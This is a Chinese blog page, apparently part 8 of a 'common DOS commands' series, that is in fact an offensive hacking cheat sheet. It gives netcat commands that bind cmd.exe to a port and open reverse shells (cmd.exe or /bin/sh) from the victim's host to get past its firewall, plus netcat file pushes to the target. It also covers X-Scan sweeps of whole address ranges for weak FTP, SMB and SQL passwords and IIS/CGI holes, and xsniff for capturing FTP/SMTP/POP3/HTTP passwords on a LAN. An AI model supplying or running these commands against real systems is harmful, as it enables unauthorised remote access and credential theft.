zoukankan      html  css  js  c++  java
  • 常用DOS命令大全8

    nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
    nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
    高级用法:
    nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
    nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt
    nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
    type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
    本机上用:nc -l -p 本机端口
    在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
    nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
    本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称
    在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
    备 注:
    | 管道命令
    < 或 > 重定向命令。"<",例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
    @ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt
    >> d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中
    >与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。
    如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。 2、扫锚工具:xscan.exe
    基本格式
    xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止
    IP"段的所有主机信息
    xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
    检测项目
    -active 检测主机是否存活
    -os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
    -port 检测常用服务的端口状态
    -ftp 检测FTP弱口令
    -pub 检测FTP服务匿名用户写权限
    -pop3 检测POP3-Server弱口令
    -smtp 检测SMTP-Server漏洞
    -sql 检测SQL-Server弱口令
    -smb 检测NT-Server弱口令
    -iis 检测IIS编码/解码漏洞
    -cgi 检测CGI漏洞
    -nasl 加载Nessus攻击脚本
    -all 检测以上所有项目
    其它选项
    -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取
    -l 显示所有网络适配器
    -v 显示详细扫描进度
    -p 跳过没有响应的主机
    -o 跳过没有检测到开放端口的主机
    -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
    -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
    用法示例
    xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测
    192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
    xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测
    192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机
    xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测"hostlist.txt"
    文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
    3、命令行方式嗅探器: xsniff.exe
    可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
    参数说明
    -tcp 输出TCP数据报
    -udp 输出UDP数据报
    -icmp 输出ICMP数据报
    -pass 过滤密码信息
    -hide 后台运行
    -host 解析主机名

  • 相关阅读:
    net.sf.json.JSONException: There is a cycle in the hierarchy!
    数据源的配置
    java枚举使用详解
    hibernate级联保存,更新个人遇到的问题
    NonUniqueObjectException 问题
    No.2 dotnetcore&docker--数据库等在Docker上的配置
    No.1 dotnetcore&docker--环境搭建
    No.5 dotnetcore&docker--采用Ambry做文件服务器
    No.3 dotnetcore&docker--搭建一个nuget服务器
    关于APM数据采集实例以及Eureka整合的一个想法
  • 原文地址:https://www.cnblogs.com/weigy/p/12509058.html
Copyright © 2011-2022 走看看